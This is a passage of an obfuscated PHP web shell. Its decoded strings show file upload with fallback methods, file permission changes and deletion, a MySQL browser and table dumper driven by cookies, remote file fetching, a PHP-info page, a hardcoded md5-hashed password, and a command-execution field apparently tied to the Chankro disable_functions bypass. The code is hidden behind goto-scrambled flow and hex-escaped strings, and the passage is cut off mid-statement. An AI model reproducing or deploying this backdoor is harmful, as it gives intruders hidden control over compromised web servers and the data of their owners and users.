$Bae9033c3cf95c45 = $dd10a73ee2d1f279->query("\x53\x45\x4c\105\x43\x54\x20\x2a\x20\106\x52\x4f\115\x20\x60" . $A815e8104dbdb799 . "\x60"); goto cbb07897dd8d4e97; A22f8202fd653881: print "\124\141\x62\x6c\x65\x20\x6e\157\164\40\146\157\x75\156\x64\41"; goto fec6470c770f47e9; fec6470c770f47e9: goto Ede14e8930e257c0; goto D95eb998e50fcf48; f5f4abdf86e74705: header("\x43\x6f\156\164\145\156\164\55\x74\171\x70\145\x3a\40\141\160\x70\x6c\151\x63\x61\164\x69\157\156\57\x6a\163\157\x6e"); goto Cd7fa292a846fe29; Cc8b6717d672a581: $dd10a73ee2d1f279 = new PDO("\155\x79\x73\x71\154\x3a\x68\x6f\x73\164\75" . $e7fc7ef47502e99b . "\73\x63\x68\x61\162\163\145\164\75\x75\x74\x66\x38\73" . $a5064888437638ee, $cf583f5d73ccf3cf, $c887d06bec538904, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\x53\105\124\x20\116\101\x4d\x45\x53\x20\47\165\x74\x66\70\x27")); goto F05bd65eb39034d5; F05bd65eb39034d5: $dd10a73ee2d1f279->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); goto E9ed1086005c9cc5; E9ed1086005c9cc5: $B21e8e9a58247acc = $dd10a73ee2d1f279->prepare("\123\105\114\x45\x43\x54\x20\x63\157\154\165\155\x6e\x5f\x6e\141\x6d\x65\40\x66\x72\x6f\155\x20\151\x6e\146\157\162\155\x61\x74\151\157\156\137\163\x63\x68\x65\155\141\56\x63\157\x6c\x75\155\x6e\x73\x20\x77\150\145\162\x65\x20\x74\x61\x62\154\145\137\x73\143\x68\145\155\x61\75\x3f\40\x61\x6e\x64\x20\x74\x61\142\154\145\137\x6e\141\x6d\145\75\x3f"); goto c2d50d1b8aa51cbc; c2d50d1b8aa51cbc: $B21e8e9a58247acc->execute(array($Cb7c56c153b6fafa, $A815e8104dbdb799)); goto aa3154aa9d19ed36; C3338d1eabfdf974: if ($Fb08e115b362cc65) { goto A73f4476d47d2794; } goto A22f8202fd653881; Af6c08057a8ba7b2: Ede14e8930e257c0: goto c3cd1331a9e132fe; dd4e88cd4727de2e: header("\103\x6f\156\x74\x65\x6e\164\x2d\144\x69\163\160\x6f\163\x69\164\151\x6f\156\x3a\x20\x61\164\x74\x61\143\x68\x6d\145\x6e\x74\73\x20\146\151\154\x65\156\x61\x6d\x65\x3d\144\x5f" . basename(htmlspecialchars($A815e8104dbdb799)) . "\56\152\x73\x6f\156"); goto f5f4abdf86e74705; D95eb998e50fcf48: A73f4476d47d2794: goto D62e1986f09ab5c5; aa3154aa9d19ed36: $Fb08e115b362cc65 = $B21e8e9a58247acc->fetchAll(); goto C3338d1eabfdf974; c3cd1331a9e132fe: } catch (Exception $E4d444a4fd968be8) { print $E4d444a4fd968be8->getMessage(); } goto af20bde18db3e14b; D288e2f0b01f3458: function C569177bE4ce65fb($E35df8bf29477b62, $db79593b5ada69af) { goto B73de6c7e3939a6e; D67dbbfe8d0f1145: $f10bc451ca23a84e["\163\x75\x63\x63\145\163\x73"] = true; goto Af740eb1a753969d; f8d04eb4cc0b3ba1: if (@move_uploaded_file($Faf4357fea41ec98, $D387235f21cb6058)) { goto A4965ebbf516f2f1; } goto f9448078a0701bed; Faa4871fa1648db5: return $f10bc451ca23a84e; goto F44f2d3a24dfdb9d; E761f1b4ed9a2c81: if (!(!isset($_FILES[$E35df8bf29477b62]) || $_FILES[$E35df8bf29477b62]["\x65\x72\x72\x6f\x72"] !== UPLOAD_ERR_OK)) { goto e9845c3c4ded379d; } goto f65402d07547217a; e3404fbb4fd28ca6: Cb31e3572ed4e9b7: goto F96f02bc9b3bd82d; F44f2d3a24dfdb9d: e9845c3c4ded379d: goto cd00fcc6bb871156; Fefefa7011241f6a: $E0b02b689480a56f = sys_get_temp_dir() . "\x2f" . uniqid("\x62\x79\x70\141\x73\163\x5f", true); goto ee8a5e4fb8800d53; C35971c3a7bec030: goto fb6b6ae8477c6856; goto A7246f1043cad174; De965be6f07daf01: $f10bc451ca23a84e["\x6d\145\163\x73\x61\x67\x65"] = "\x41\x6c\x6c\40\165\160\154\x6f\x61\x64\40\155\145\x74\150\157\144\163\x20\146\x61\151\154\145\144\x2c\x20\160\154\145\x61\163\145\40\143\x68\x65\x63\x6b\40\x70\x65\162\155\151\x73\163\151\x6f\156\x73\x20\x6f\x72\x20\x73\145\x72\x76\x65\x72\40\162\x65\163\x74\162\151\x63\164\x69\x6f\x6e\163\56"; goto C35971c3a7bec030; dc2f669a3c381997: F0fbbda38f5c1904: goto E27bf26ecded7f34; bd5fdf6ca0097bcf: fb6b6ae8477c6856: goto bbd1aedcdb77cbd3; B73de6c7e3939a6e: $f10bc451ca23a84e = ["\163\x75\143\x63\145\x73\163" => false, "\155\x65\x74\x68\x6f\x64" => '', "\155\x65\x73\163\141\x67\145" => '', "\x6e\141\155\145" => '']; goto E761f1b4ed9a2c81; fc01a73cea7c6401: goto E5d4b165dad41ad6; goto d2888ecab253ca57; f65402d07547217a: $f10bc451ca23a84e["\155\x65\163\163\141\x67\x65"] = "\116\x6f\40\146\x69\x6c\145\x20\163\145\x6c\x65\x63\x74\x65\144\40\x6f\162\x20\x75\160\154\157\141\144\40\x65\162\x72\157\162\40\50\145\162\x72\157\162\40\x63\x6f\x64\x65\x3a\x20" . (isset($_FILES[$E35df8bf29477b62]["\145\162\162\157\x72"]) ? $_FILES[$E35df8bf29477b62]["\x65\x72\x72\157\x72"] : "\165\156\x6b\x6e\x6f\x77\156") . "\x29"; goto Faa4871fa1648db5; cf4af1cb22f23d08: $f10bc451ca23a84e["\155\145\164\150\x6f\144"] = "\143\157\x70\x79"; goto fc01a73cea7c6401; bbf62b00e03d48bb: $f10bc451ca23a84e["\x6d\x65\x74\150\157\144"] = "\x6d\157\166\145\137\x75\160\x6c\x6f\x61\x64\145\144\x5f\x66\151\x6c\x65"; goto F41f02da4cb332e1; b8d4e731157b876c: $f10bc451ca23a84e["\155\x65\x73\x73\141\147\145"] = "\x46\151\154\145\40\165\x70\154\x6f\141\x64\x65\x64\40\x73\165\143\143\x65\163\x73\x66\x75\154\x6c\x79\40\x28\x3c\163\x74\x72\x6f\x6e\147\x3e{$f10bc451ca23a84e["\x6d\145\164\150\157\x64"]}\x3c\57\163\x74\162\157\156\147\76\51\72\x20\74\141\x20\150\162\145\146\75\x22" . htmlspecialchars($d8463d93c69599f9) . "\x22\40\164\141\x72\x67\145\164\x3d\x22\x5f\142\x6c\x61\x6e\x6b\42\x3e" . htmlspecialchars($d8463d93c69599f9) . "\x3c\x2f\x61\76"; goto bd5fdf6ca0097bcf; c329985f6ea3d13f: $f10bc451ca23a84e["\156\x61\155\x65"] = $d8463d93c69599f9; goto b8d4e731157b876c; A7d7eb2e0004cb24: $f10bc451ca23a84e["\163\165\143\x63\x65\163\163"] = true; goto bbf62b00e03d48bb; F96f02bc9b3bd82d: goto E5d4b165dad41ad6; goto C822141d362bc4b9; cd00fcc6bb871156: $d8463d93c69599f9 = basename($_FILES[$E35df8bf29477b62]["\x6e\x61\x6d\145"]); goto e9848a23bdda828e; A9eff282ff83958b: @unlink($E0b02b689480a56f); goto F43f8a7f43c90e3f; E27bf26ecded7f34: @unlink($Faf4357fea41ec98); goto C82c95a6c95879a1; A5c82cca1bb70e2c: E5d4b165dad41ad6: goto f83c0dd0f365f95b; F41f02da4cb332e1: goto E5d4b165dad41ad6; goto dc2f669a3c381997; e9848a23bdda828e: $Faf4357fea41ec98 = $_FILES[$E35df8bf29477b62]["\x74\155\x70\x5f\x6e\x61\x6d\x65"]; goto C78e960110a70264; bbd1aedcdb77cbd3: return $f10bc451ca23a84e; goto F04e21c07d79309c; Af740eb1a753969d: $f10bc451ca23a84e["\x6d\x65\x74\150\157\x64"] = "\146\151\154\145\x5f\x67\x65\164\x5f\x63\x6f\156\x74\145\x6e\x74\x73"; goto A5c82cca1bb70e2c; ee8a5e4fb8800d53: if (!(@rename($E0b02b689480a56f, $E0b02b689480a56f) && @copy($E0b02b689480a56f, $D387235f21cb6058))) { goto Cb31e3572ed4e9b7; } goto A9eff282ff83958b; A7246f1043cad174: Fcf95a8c7d415757: goto c329985f6ea3d13f; F43f8a7f43c90e3f: $f10bc451ca23a84e["\x73\165\x63\143\x65\163\x73"] = true; goto D5af5e55eece98cb; D5af5e55eece98cb: $f10bc451ca23a84e["\155\x65\164\x68\157\144"] = "\x72\x65\156\141\x6d\x65\53\x63\x6f\160\x79"; goto e3404fbb4fd28ca6; Be1b98d256132be5: @unlink($Faf4357fea41ec98); goto D67dbbfe8d0f1145; f9448078a0701bed: if (@copy($Faf4357fea41ec98, $D387235f21cb6058)) { goto F0fbbda38f5c1904; } goto aef77250d30fa5c6; d2888ecab253ca57: e24fcfab6f04df6e: goto Be1b98d256132be5; aef77250d30fa5c6: if (($Bae9033c3cf95c45 = @file_get_contents($Faf4357fea41ec98)) !== false && @file_put_contents($D387235f21cb6058, $Bae9033c3cf95c45)) { goto e24fcfab6f04df6e; } goto Fefefa7011241f6a; C78e960110a70264: $D387235f21cb6058 = rtrim($db79593b5ada69af, "\x2f") . "\57" . $d8463d93c69599f9; goto f8d04eb4cc0b3ba1; C82c95a6c95879a1: $f10bc451ca23a84e["\163\x75\143\143\x65\163\x73"] = true; goto cf4af1cb22f23d08; C822141d362bc4b9: A4965ebbf516f2f1: goto A7d7eb2e0004cb24; f83c0dd0f365f95b: if ($f10bc451ca23a84e["\x73\x75\143\x63\145\x73\163"]) { goto Fcf95a8c7d415757; } goto De965be6f07daf01; F04e21c07d79309c: } goto d686201d78c2ffc1; Bea23b8993020018: echo "\74\57\x74\x62\x6f\x64\x79\76\x3c\57\164\141\x62\x6c\x65\76\74\57\x64\x69\166\x3e"; goto fece1904235170af; Cc0437eb223b9996: echo B526E9837163414E($f6f05644d791da73); goto Ff0774e1b3b25c2c; Af4eb0071f98fb32: bd4d92a38ba87690: goto A36f099b82ddb604; d1a34be4db817cdb: if (isset($_POST["\153\157\155"]) && is_string($_POST["\153\x6f\x6d"]) && !empty($_POST["\153\x6f\x6d"])) { goto cb64a1c5173b65a8; } goto D0294a12f9234528; D1803e7c5629b1b1: header("\103\x6f\x6e\164\x65\x6e\x74\55\124\171\160\145\72\40\141\x70\x70\154\x69\143\x61\164\151\157\156\x2f\157\x63\164\x65\164\x2d\x73\x74\162\145\x61\155"); goto c93c83d6ddc0fbb9; Cc15f2c0bdf3968c: $e7fc7ef47502e99b = isset($_COOKIE["\150\157\x73\164"]) ? $_COOKIE["\x68\x6f\x73\x74"] : ''; goto Ed3709d1dfba8116; E0971a9bf86752e8: $ceed1626500ecd14 = F64198CB3E765A83($_POST["\x62\145\162\x6b\x61\163"]); goto bf8398500d3afa67; B66f609382f322fa: echo "\74\57\x73\x70\141\x6e\76\xd\xa\40\40\40\x20\40\40\40\x20\40\40\x20\40\74\x73\x70\141\156\x20\163\164\171\154\145\x3d\x22\x6d\x61\x72\x67\151\x6e\x2d\x6c\145\x66\164\x3a\x20\63\x72\x65\x6d\73\x22\x3e\x3c\141\x20\x68\x72\x65\146\x3d\x27\152\x61\166\141\163\143\x72\151\x70\x74\72\156\141\166\x69\147\x61\164\x65\50\42\x61\167\141\x6c\x22\x2c\40\42\x70\150\x70\151\x6e\146\x6f\x22\x29\x27\x20\x73\164\171\x6c\145\x3d\x22\143\x6f\x6c\157\162\72\40\43\x30\x30\x46\106\60\60\73\x22\76\133\40\120\110\120\x20\111\156\146\157\x20\x5d\x3c\57\x61\76\x3c\57\x73\160\141\156\76\xd\12\40\40\x20\x20\x20\x20\40\40\74\57\x70\76\xd\xa\x20\40\40\x20\x20\x20\40\40\x3c\x70\76\15\xa\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\40\74\163\x74\162\x6f\x6e\147\x20\x73\164\x79\x6c\x65\x3d\x22\x63\x6f\x6c\157\162\72\x20\43\x30\60\x46\106\60\x30\x3b\42\x3e\x53\145\x72\166\145\x72\40\x41\x64\x64\x72\x65\163\163\x3a\74\x2f\163\x74\162\x6f\x6e\147\x3e\xd\12\40\x20\40\x20\40\40\40\x20\x20\40\x20\40\74\x73\160\x61\x6e\x20\x73\x74\x79\x6c\145\75\x22\x63\157\154\157\162\x3a\40\43\146\x66\x66\x66\x66\146\73\x22\x3e"; goto Fee4d000999a1998; b523a30135c716ab: if (isset($c31208d29cfc6afb)) { goto Ae971299e9415e74; } goto Bd4043a0035cbf79; eae38c2da36e0440: goto f37e884184d7859c; goto Bb9b700a6678432c; da40496da0d5bb89: $C317bca205c5d454 = basename(F64198Cb3e765A83($_POST["\156\145\x77\x5f\156\x61\155\145"])); goto A28200051a55e358; f9da955264c78e9f: print "\x45\162\162\157\x72\x21\x20" . htmlspecialchars($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3); goto f313dd299af00b3e; c6faf69ea289372a: if ($ffc943dc0b3a48b0 == "\x6b\x6f\x6d\160\162\x65\x73" && isset($_POST["\x73\x61\x76\145\x5f\164\157"], $_POST["\172\146"]) && is_string($_POST["\x73\x61\x76\145\x5f\x74\x6f"]) && !empty($_POST["\163\141\166\x65\137\164\x6f"]) && !in_array($_POST["\163\141\166\145\x5f\x74\x6f"], array("\56", "\56\56", "\x2e\57", "\x2e\x2e\57")) && is_string($_POST["\172\x66"]) && !empty($_POST["\x7a\x66"])) { goto ccd4e34db16f8cc0; } goto c2122a989c3c5c82; B0aee7bcd302a16b: $a8077a89a475b697 = E6c6E5CF9BDDfE66($E0041c26b5b7fe6e); goto Fbc45bb14fbc7e4a; D711ae20a6e72972: if (isset($_POST["\x63\150\x61\x6e\153\x72\x6f\x5f\x63\157\x6d\155\x61\x6e\x64"]) && !empty($_POST["\x63\x68\x61\156\153\x72\157\x5f\143\157\x6d\x6d\x61\x6e\144"])) { goto E5b546c663b7da65; } goto ced461e967e2fa6b; d6d317f67e74eeab: die; goto eb786d4c3ffb51d8; d84d2b24c8fd9d81: $db79593b5ada69af = __DIR__; goto Bc197fa15a90bc0f; d3e71a9cc8d3e77b: e39776711e6bd8bf: goto Af5256653f5bcc41; Fdc88e022a2bbfce: db93c08a57a49578: goto Fd1ec1ff24a7620b; A5f0c17924f67dea: C79543e60f43da14: goto F6c1ae69b3ef17a1; D61cb9ed1ce4dc64: echo "\74\x64\151\x76\x20\163\x74\171\x6c\145\75\x22\164\x65\170\164\x2d\141\154\151\x67\156\72\x20\x63\x65\x6e\164\x65\x72\x3b\40\x63\157\x6c\157\x72\x3a\40\x23\x30\x66\60\73\x20\x6d\141\162\x67\151\156\x3a\x20\60\x2e\x37\x72\145\x6d\x3b\x22\x3e" . $c31208d29cfc6afb . "\74\x2f\144\x69\x76\76"; goto E3f263e0f8d6e796; Bb0b747b86bcbc4c: if (@chmod($Babedf152eb7b8d1, octdec($Ef8872caa0979af0))) { goto Bb9ebec764dd202a; } goto A4c4ea4c92181fa5; f5d88dbff594a375: ob_start(); goto ee28bd174e4b5bd4; efcb2597008cb18d: echo b526e9837163414e($f6f05644d791da73); goto b2face7b7c24a865; a8c0d8cec0545f0e: if (!isset($_POST["\144\141\164\141\x62\141\163\145"])) { goto e85bdd0e40b000b3; } goto a1199b0d5eec61c3; B28e3fed720aff95: mkdir($f6f05644d791da73 . $c9c3dbf37270f221 . $a1cb9ff287442a69); goto e7834e251ef84476; Df23dc518aa2b999: $C30da0039db7258c = "\106\141\151\x6c\145\144\40\x74\x6f\x20\144\x6f\167\156\154\157\141\x64\x20\146\x69\x6c\145\x2e\40\102\157\x74\150\40\143\125\x52\x4c\x20\x61\x6e\x64\40\141\154\154\157\167\x5f\x75\x72\x6c\x5f\x66\x6f\160\x65\x6e\40\x6d\141\171\40\142\x65\40\144\x69\x73\141\142\154\145\x64\x20\157\162\40\164\x68\145\x20\162\145\155\157\164\145\x20\x68\x6f\163\x74\x20\146\x61\151\x6c\x65\x64\x2e"; goto dee45c3075fc0d8f; dd1d4f694c74e620: efd3d135f4fbf807: goto A9b4fc3781009ceb; B3e754258a4919a8: $D5c83ad3048f2287 = "\114\x75\154\172\61\x33\x33\67"; goto F18c9a74504a2cc7; F60c85a45bd7eb20: function a6427Da082F2eF1f($a15a180128df9aaa) { goto Cbff9e11d41694fe; Bd0ca35d9be366bf: $a15a180128df9aaa = $a15a180128df9aaa . "\40\142"; goto A97c122db8208adb; c3c3f0b9f40ada75: $a15a180128df9aaa = number_format($a15a180128df9aaa / 1048576, 2) . "\x20\115\142"; goto A5146e71e66a8e7d; A97c122db8208adb: goto F7b54abd2fc09aca; goto E8669a1f088d5dc0; f8b8ed8b54c8e912: C85a88dce53359c2: goto c3c3f0b9f40ada75; b917035451d1cc00: if ($a15a180128df9aaa >= 1024) { goto b752aa2b9d1d67db; } goto Bd0ca35d9be366bf; F8c2c685138d4b7e: goto B062d2a414fbf47a; goto E0bd61c7a7391dd7; E14236ae4d1dc660: if ($a15a180128df9aaa >= 1048576) { goto C85a88dce53359c2; } goto b917035451d1cc00; fc16706854f298c4: return $a15a180128df9aaa; goto c957248e710a7ee4; e25409a837776631: B062d2a414fbf47a: goto fc16706854f298c4; c8fc309b61a8ad27: $a15a180128df9aaa = number_format($a15a180128df9aaa / 1024, 2) . "\40\x4b\142"; goto D20b06f6ec464f08; E8669a1f088d5dc0: b752aa2b9d1d67db: goto c8fc309b61a8ad27; A5146e71e66a8e7d: cedce57b9d1c13f6: goto F8c2c685138d4b7e; D20b06f6ec464f08: F7b54abd2fc09aca: goto f955f545b23f5ef1; C82937340156e9cb: $a15a180128df9aaa = number_format($a15a180128df9aaa / 1073741824, 2) . "\40\x47\x62"; goto e25409a837776631; Cbff9e11d41694fe: if ($a15a180128df9aaa >= 1073741824) { goto d26beb6f702a30ae; } goto E14236ae4d1dc660; f955f545b23f5ef1: goto cedce57b9d1c13f6; goto f8b8ed8b54c8e912; E0bd61c7a7391dd7: d26beb6f702a30ae: goto C82937340156e9cb; c957248e710a7ee4: } goto C58fbb1af36df872; ba83a358ca45bf9b: print "\x45\x72\x72\x6f\162\x21\x20\120\154\x65\141\163\145\x20\143\157\x6e\156\x65\143\164\40\164\x6f\40\123\121\x4c\41"; goto A148bd1eb13686bc; Fb78ac7b71713cd7: echo "\x44\151\163\141\x62\x6c\x65\144"; goto b3388d48b540757d; d2a011e2b3af5463: setcookie("\144\141\x74\141\x62\x61\x73\x65", '', time() - 3600); goto B09df14431b800f6; ac4338713fb7f806: echo date("\131\x2d\x6d\55\144\40\x48\x3a\x69\x3a\x73"); goto Cf424d42b24c1c3b; f4b4753e1187e809: bacf0b9bbbad477b: goto c1b5ed18ae44ecd3; C77ca4ccb5326d24: if (!($_SERVER["\122\105\121\125\105\x53\124\137\115\x45\x54\x48\x4f\x44"] === "\120\117\x53\x54")) { goto C227c63d47a17b8c; } goto Daa45b5282ea4ab8; C659e3ba08730e06: $dc0f70f3261828f3 = basename(F64198Cb3E765a83($_POST["\146\x61\x79\x6c"])); goto b3d5756979fca915; C2360080d1fc6582: $C30da0039db7258c = "\106\151\x6c\145\40\156\x6f\164\40\146\x6f\x75\156\x64\72\40" . htmlspecialchars($dc0f70f3261828f3); goto Fe4d6b7bc66f24c7; a8c70c8e949c2552: if (isset($_GET["\141\167\x61\154"]) && $_GET["\141\x77\x61\x6c"] == "\160\151\x6e\146") { goto a38605b8a520d0a7; } goto Eec922d8383f4475; A7e3517fdebffd75: print str_replace("\142\157\x64\171\x20\173\x62\x61\x63\x6b\x67\x72\x6f\x75\x6e\144\x2d\x63\157\154\x6f\x72\72\x20\x23\146\x66\x66\x66\146\x66\73\40\x63\157\x6c\x6f\x72\72\x20\43\60\x30\60\60\60\x30\73\x7d", '', $de37df5acf20bfe4); goto d0dc0a630db036e0; F2b5e6af566ae12f: echo "\x22\76\xd\xa\40\x20\x20\x20\40\40\x20\x20\x20\x20\x20\x20\x3c\151\156\x70\x75\x74\40\x74\171\160\145\75\x22\x66\151\154\145\42\x20\x6e\141\x6d\x65\75\42\165\146\x69\154\145\42\x20\151\x64\x3d\x22\146\151\x6c\x65\55\151\156\x70\165\x74\x2d\162\x65\x61\154\x22\x20\x73\x74\x79\154\145\x3d\42\144\x69\x73\x70\154\x61\x79\x3a\40\156\157\x6e\145\73\x22\76\xd\xa\x20\40\x20\x20\40\40\x20\40\40\x20\40\40\xd\xa\x20\40\40\40\x20\40\x20\x20\x20\40\40\40\x3c\151\x20\143\154\141\163\163\75\x22\x66\x61\x73\40\x66\141\x2d\143\154\157\x75\x64\x2d\x75\160\x6c\x6f\x61\x64\x2d\x61\154\x74\40\x75\x70\154\157\141\x64\x2d\151\143\x6f\156\x22\x3e\74\57\x69\76\15\xa\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\x3c\160\40\143\154\141\163\163\x3d\42\165\x70\154\x6f\x61\x64\x2d\164\x65\170\x74\42\76\104\x72\141\147\x20\x26\x20\144\x72\157\x70\x20\171\x6f\x75\162\x20\146\151\154\145\x20\x68\145\162\145\40\x6f\162\40\74\163\x70\141\x6e\76\x62\x72\x6f\167\163\145\74\57\x73\x70\141\x6e\x3e\x20\x74\157\40\165\160\x6c\x6f\x61\144\x2e\74\57\160\x3e\xd\12\40\40\xd\xa\x20\40\40\40\x20\40\40\40\40\x20\x20\x3c\x2f\146\x6f\x72\x6d\x3e\15\12\40\40\x20\40\74\57\144\151\x76\76\xd\12\40\x20\x20\40\74\x64\x69\166\x20\x63\x6c\141\x73\x73\75\x22\x70\x72\157\x67\x72\145\163\x73\x2d\143\x6f\x6e\x74\x61\x69\156\x65\162\42\x20\151\144\75\42\x70\162\157\147\162\x65\163\163\x2d\143\157\x6e\164\x61\151\156\x65\x72\42\x3e\xd\12\x20\x20\40\x20\x20\x20\x20\40\74\144\151\x76\40\143\154\x61\163\x73\x3d\42\160\162\x6f\147\x72\x65\163\163\55\x62\141\162\x22\x20\151\x64\x3d\42\x70\x72\157\x67\x72\x65\x73\x73\x2d\x62\141\x72\42\x3e\x3c\x2f\144\x69\166\x3e\xd\xa\40\40\40\40\x3c\x2f\144\x69\166\76\xd\xa\40\40\40\40\74\144\x69\x76\x20\151\144\x3d\x22\165\160\154\x6f\141\x64\x53\164\141\x74\x75\x73\x22\40\163\164\171\x6c\x65\x3d\x22\x74\145\x78\x74\x2d\x61\154\x69\x67\156\x3a\40\143\145\x6e\x74\x65\x72\73\x20\155\x61\162\x67\x69\156\55\x74\157\x70\x3a\x20\x31\x72\x65\x6d\x3b\x22\76\74\x2f\144\x69\x76\76\15\12\x20\40\40\x20"; goto c65318acbe16b1df; A9900a0a22f6da59: echo htmlspecialchars($cf583f5d73ccf3cf); goto ac7b1e9e94be321a; B6ed9868cc1f557a: if ($ffc943dc0b3a48b0 == "\163\153\x6c\137\144") { goto e8c3dde14ef98727; } goto c6faf69ea289372a; B8aa385d46e7e910: b3664044183afc0d: goto Bf16b2d2f9e088ee; C448479f0a447f72: echo $Cb7c56c153b6fafa; goto C9eb091b8aedfba8; F18c9a74504a2cc7: $b8620b74d07d71dc = md5($D5c83ad3048f2287); goto b7c075f234257981; fcf81aa0da022b40: F2d068205e264d66: goto A934d5e45078709f; C9eb091b8aedfba8: echo "\47\51\73\xd\12\x7d\xd\12\146\165\156\143\x74\x69\157\156\40\x62\x36\64\x45\156\143\x6f\144\x65\125\x6e\x69\x63\157\144\145\50\163\164\162\51\15\xa\173\15\12\11\162\145\164\x75\x72\x6e\40\142\164\157\x61\50\x65\156\143\157\144\x65\125\122\x49\103\157\x6d\x70\157\x6e\145\156\164\x28\x73\x74\x72\x29\x2e\x72\x65\160\x6c\x61\143\x65\50\x2f\x25\x28\x5b\x30\x2d\x39\x41\55\x46\x5d\x7b\x32\175\51\x2f\147\x2c\xd\12\11\x9\x66\165\x6e\x63\164\151\157\x6e\40\164\157\123\x6f\154\151\144\102\171\x74\145\x73\x28\155\x61\164\143\x68\54\x20\160\61\51\x20\x7b\15\12\11\11\11\162\145\x74\165\162\x6e\x20\123\164\x72\x69\156\x67\56\x66\x72\157\x6d\x43\150\141\x72\103\x6f\x64\145\50\47\x30\x78\x27\x20\x2b\x20\x70\61\51\x3b\xd\xa\x7d\51\x29\73\xd\xa\175\xd\12\xd\xa\x66\x75\156\143\164\x69\157\156\40\164\157\147\147\154\x65\125\x70\154\x6f\141\144\x28\51\x20\x7b\xd\12\x20\x20\x20\x20\x76\141\x72\x20\165\160\x6c\x6f\x61\x64\103\157\156\164\141\151\156\145\162\x20\x3d\40\x64\x6f\143\x75\155\x65\x6e\164\x2e\x67\x65\164\105\x6c\145\x6d\145\156\x74\102\x79\111\x64\50\x27\x75\x70\154\157\141\144\x43\157\x6e\x74\141\x69\x6e\145\162\x27\51\x3b\15\12\x20\x20\x20\x20\151\x66\x20\x28\165\x70\154\x6f\x61\x64\103\157\x6e\x74\x61\151\156\145\x72\56\163\164\171\x6c\x65\56\x64\151\x73\160\x6c\x61\x79\40\x3d\x3d\75\40\47\x6e\157\156\x65\47\40\174\174\x20\x75\160\x6c\x6f\x61\144\103\157\x6e\x74\x61\x69\x6e\145\162\56\x73\164\x79\154\145\x2e\144\151\163\160\154\141\x79\40\75\x3d\75\40\x27\x27\51\x20\x7b\xd\12\x20\40\x20\x20\x20\x20\x20\x20\x75\x70\x6c\x6f\x61\x64\x43\x6f\x6e\164\141\x69\x6e\x65\x72\56\163\x74\171\154\x65\56\144\151\163\x70\x6c\x61\171\x20\x3d\x20\47\x62\154\x6f\x63\x6b\x27\73\15\12\x20\x20\x20\40\175\40\145\x6c\163\145\40\173\xd\12\40\x20\x20\x20\x20\40\x20\40\x75\x70\x6c\x6f\x61\144\103\x6f\156\x74\141\151\156\145\162\x2e\163\x74\x79\154\145\56\x64\x69\x73\160\x6c\x61\171\x20\x3d\40\47\x6e\157\156\x65\47\x3b\xd\12\x20\x20\x20\x20\175\xd\12\x7d\xd\12\xd\xa\146\165\x6e\x63\164\151\157\156\40\164\157\x67\147\x6c\x65\106\x65\x74\x63\x68\x65\162\50\51\40\173\15\12\x20\x20\40\x20\166\141\162\40\146\145\x74\143\x68\103\x6f\156\x74\141\x69\x6e\x65\162\40\x3d\40\144\157\143\x75\155\145\x6e\x74\x2e\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\102\x79\111\144\x28\47\x66\x65\164\x63\150\x43\157\x6e\164\x61\151\x6e\145\162\47\x29\73\xd\12\x20\x20\40\x20\151\x66\40\x28\x66\145\x74\143\x68\x43\x6f\156\x74\141\x69\x6e\x65\162\x2e\163\164\x79\154\145\56\144\151\163\160\154\x61\171\x20\x3d\x3d\75\40\x27\156\157\x6e\x65\47\40\174\x7c\40\146\x65\164\x63\150\x43\157\156\x74\x61\151\156\x65\162\56\163\x74\171\x6c\145\x2e\x64\x69\163\x70\154\141\171\x20\x3d\75\x3d\x20\47\x27\x29\40\x7b\xd\xa\x20\x20\40\40\x20\40\x20\x20\x66\x65\164\x63\150\103\x6f\x6e\x74\x61\x69\x6e\145\162\x2e\x73\164\x79\x6c\x65\56\x64\151\x73\160\154\141\171\40\x3d\40\x27\142\x6c\x6f\143\x6b\x27\73\xd\xa\x20\40\x20\x20\175\40\x65\154\x73\145\40\173\xd\xa\x20\x20\x20\x20\40\40\40\x20\146\145\164\143\150\103\157\156\164\141\151\156\x65\x72\56\x73\x74\171\x6c\x65\56\x64\151\x73\x70\x6c\x61\x79\40\x3d\x20\47\x6e\157\156\x65\x27\73\xd\xa\40\x20\x20\x20\x7d\15\12\175\xd\xa\15\xa\166\x61\x72\x20\143\157\x6d\x6d\141\156\x64\111\156\x70\165\164\x20\x3d\x20\x64\x6f\x63\165\x6d\145\x6e\164\56\x67\145\x74\105\x6c\145\155\145\x6e\164\102\171\x49\x64\50\x22\145\x6d\162\137\145\164\137\141\x74\x61\x73\x68\42\x29\73\15\xa\x69\146\50\x63\157\155\155\141\156\x64\111\x6e\x70\x75\x74\51\x20\x7b\xd\12\40\40\x20\40\143\157\155\x6d\141\156\144\x49\156\x70\165\x74\56\141\x64\x64\105\166\x65\x6e\x74\x4c\151\163\x74\145\x6e\x65\x72\50\42\153\145\x79\165\x70\x22\54\40\146\x75\156\x63\164\151\x6f\156\x28\x65\x76\x65\156\x74\51\xd\12\40\x20\40\40\173\xd\12\x20\40\40\40\x20\x20\40\x20\x65\x76\x65\156\164\x2e\160\162\145\x76\x65\156\x74\x44\145\146\x61\165\x6c\164\x28\x29\x3b\15\xa\40\x20\40\40\x20\40\x20\40\151\146\x28\x65\166\x65\x6e\x74\x2e\x6b\x65\x79\40\x3d\x3d\x3d\x20\47\x45\156\164\x65\162\47\x29\15\12\x20\x20\x20\40\40\x20\x20\x20\x7b\xd\12\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x73\x69\x73\164\x65\x6d\113\157\x6d\50\51\73\xd\xa\40\x20\x20\40\40\x20\40\x20\175\15\xa\40\40\x20\40\x7d\x29\x3b\xd\12\175\xd\12\74\57\x73\x63\x72\151\x70\x74\76\15\xa\74\163\x63\162\151\160\164\76\xd\12\x63\157\x6e\163\164\x20\x75\x70\x6c\157\x61\144\x50\x61\156\145\x6c\x20\x3d\x20\x64\x6f\143\x75\155\145\x6e\164\x2e\147\x65\164\105\x6c\x65\x6d\x65\x6e\x74\102\x79\x49\144\x28\x27\165\160\x6c\157\141\x64\x2d\160\141\156\x65\x6c\x27\x29\x3b\xd\xa\143\x6f\x6e\163\x74\40\x72\x65\141\x6c\x46\x69\154\145\111\x6e\x70\x75\164\40\x3d\40\144\x6f\143\165\155\x65\x6e\164\56\x67\x65\164\x45\x6c\x65\x6d\x65\156\x74\x42\171\111\x64\50\47\x66\151\154\145\55\151\x6e